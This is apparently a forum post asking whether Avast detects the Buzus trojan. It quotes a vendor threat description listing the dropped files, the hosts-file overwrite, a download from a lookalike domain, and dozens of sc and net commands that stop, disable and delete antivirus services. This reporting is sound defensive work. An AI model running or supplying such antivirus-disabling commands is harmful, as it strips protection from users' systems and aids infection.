a Trojan. that shutdown Anti-virus.

can avast detect this worm yet

TR/Buzus.dhxv - Trojan

Files It copies itself to the following locations:
• %drive%\conime.exe
• %SYSDIR%\wcoredt.exe

It overwrites a file.
– %SYSDIR%\drivers\etc\hosts

It deletes the initially executed copy of itself.

The following file is created:

– %drive%\autorun.inf This is a non malicious text file with the following content:
• %code that runs malware%

It tries to download a file:

– The location is the following:
http://up.g-youtube.info/net/**********

It tries to executes the following files:

– Filename:
• ipconfig /flushdns

– Filename:
• sc delete K7TSMngr

– Filename:
• net stop “avast! Antivirus”

– Filename:
• sc stop “avast! Antivirus”

– Filename:
• sc config “avast! Antivirus” start= disabled

– Filename:
• net1 stop “avast! Antivirus”

– Filename:
• sc delete “avast! Antivirus”

– Filename:
• net stop AntiVirService

– Filename:
• sc stop AntiVirService

– Filename:
• sc config AntiVirService start= disabled

– Filename:
• net1 stop AntiVirService

– Filename:
• net stop K7RTScan

– Filename:
• sc delete AntiVirService

– Filename:
• net stop PASRV

– Filename:
• sc stop PASRV

– Filename:
• net1 stop PASRV

– Filename:
• sc config PASRV start= disabled

– Filename:
• sc delete PASRV

– Filename:
• net stop VSSERV

– Filename:
• sc stop VSSERV

– Filename:
• sc config VSSERV start= disabled

– Filename:
• net1 stop VSSERV

– Filename:
• sc stop K7RTScan

– Filename:
• sc delete VSSERV

– Filename:
• net stop avg8wd

– Filename:
• sc stop avg8wd

– Filename:
• sc config avg8wd start= disabled

– Filename:
• net1 stop avg8wd

– Filename:
• sc delete avg8wd

– Filename:
• net stop avg9wd

– Filename:
• sc stop avg9wd

– Filename:
• net1 stop avg9wd

– Filename:
• sc config avg9wd start= disabled

– Filename:
• sc config K7RTScan start= disabled

– Filename:
• sc delete avg9wd

– Filename:
• net stop NOD32krn

– Filename:
• sc stop NOD32krn

– Filename:
• net1 stop NOD32krn

– Filename:
• sc config NOD32krn start= disabled

– Filename:
• sc delete NOD32krn

– Filename:
• net stop ekrn

– Filename:
• sc stop ekrn

– Filename:
• net1 stop ekrn

– Filename:
• sc config ekrn start= disabled

– Filename:
• net1 stop K7RTScan

– Filename:
• sc delete ekrn

– Filename:
• net stop McShield

– Filename:
• sc stop McShield

– Filename:
• net1 stop McShield

– Filename:
• sc config McShield start= disabled

– Filename:
• sc delete McShield

– Filename:
• net stop OutpostFirewall

– Filename:
• sc stop OutpostFirewall

– Filename:
• sc config OutpostFirewall start= disabled

– Filename:
• sc delete K7RTScan

– Filename:
• net stop K7TSMngr

– Filename:
• sc stop K7TSMngr

– Filename:
• sc config K7TSMngr start= disabled

– Filename:
• net1 stop K7TSMngr

more info http://www.avira.com/en/threats/section/fulldetails/id_vir/5193/tr_buzus.dhxv.html

2010.02.16 - VirusTotal - 5/40
http://www.virustotal.com/analisis/ad48136e328398c36d53699e215946d15afcd22cb9e2eb816a6169e355645120-1266312211

if you have a sample scan it again and post the result…